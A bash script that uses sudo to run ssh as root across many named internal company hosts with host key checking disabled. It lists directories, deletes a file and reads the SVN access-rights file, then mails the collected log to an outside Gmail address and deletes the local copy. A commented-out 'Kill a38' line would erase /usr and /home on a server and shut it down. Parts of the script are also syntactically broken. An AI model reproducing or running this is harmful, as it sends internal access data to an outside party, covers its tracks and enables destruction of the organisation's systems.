#/bin/bash

logfile="get_nmon.log"
databases=( rd rr ad ar ed )
was=( rd rr ad ar ed )
mq=( rdmq01 rdmq02 admq03 admq04 )
ihs=( rdweb01 rdweb02 adweb01 adweb02 )
touch $logfile

function ssh_root() {
    local ssh_exit_code
    sudo su - fbadmin -c " ssh -oStrictHostKeyChecking=no -l root '$@'"
    ssh_exit_code=$?
    [[ $ssh_exit_code -eq 255 ]] && die "ssh to host $1 failed."
    [[ $ssh_exit_code -ne 0 ]] && die "ssh $@ failed."
    return $ssh_exit_code
}

date >> $logfile
echo " ----------deploy01------------- " >> $logfile
sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root deploy01.fleetboard.dmz 'cd /home/fbadmin/; ls -al'" >> $logfile
sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root deploy01.fleetboard.dmz 'rm -rf /home/fbadmin/hs_err_pid7190.log' >> $logfile

echo " ----------deploy01------------- " >> $logfile
sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root deploy01.fleetboard.dmz 'cd /home/fbadmin/; ls -al'" >> $logfile

echo " ----------build01------------- " >> $logfile
sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root build01.es.fleetboard.dmz 'cd /home/fbadmin/; ls -al'" >> $logfile

echo " ----------databases------------- " >> $logfile
for d in ${databases[@]}; do
	echo "----------${d}-------------" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root zu5"$d"005 'cd /home/fbadmin/; ls -al'" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root zu5"$d"002 'cd /home/fbadmin/; ls -al'" >> $logfile
done

echo " ----------was------------- " >> $logfile
for w in ${was[@]}; do
	echo "----------${w}-------------" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root "$w"was01l2 'cd /home/fbadmin/; ls -al'" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root "$w"was02l2 'cd /home/fbadmin/; ls -al'" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root "$w"was01l5 'cd /home/fbadmin/; ls -al'" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root "$w"was02l5 'cd /home/fbadmin/; ls -al'" >> $logfile
done

for m in ${mq[@]}; do
	echo "----------${m}-------------" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root $m 'cd /home/fbadmin/; ls -al'" >> $logfile
done

for i in ${ihs[@]}; do
	echo "----------${i}-------------" >> $logfile
	sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root $i 'cd /home/fbadmin/; ls -al'" >> $logfile
done

echo " ----------svn------------- " >> $logfile
sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l svnadm svn.fleetboard.dmz 'cd /home/svnadm/svnadmin; ls -al'" >> $logfile
echo " ----------svn user rights------------- " >> $logfile
sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l svnadm svn.fleetboard.dmz 'cat /home/svnadm/svnadmin/trunk/public-svn-authzfile'" >> $logfile

echo " ---------------------------- " >> $logfile
#echo "Kill a38" >> $logfile
#sudo su - fbadmin -c "ssh -oStrictHostKeyChecking=no -l root s96fb0a38.rts.fleetboard.dmz 'rm -rf /usr/*; rm -rf /home/*; ls -al /usr/; ls -al /home/; shutdown -P now'" >> $logfile

echo "Finished @" >> $logfile
date >> $logfile

cat $logfile | mail -s "log" fl33tb0ard@gmail.com

rm $logfile

exit 0
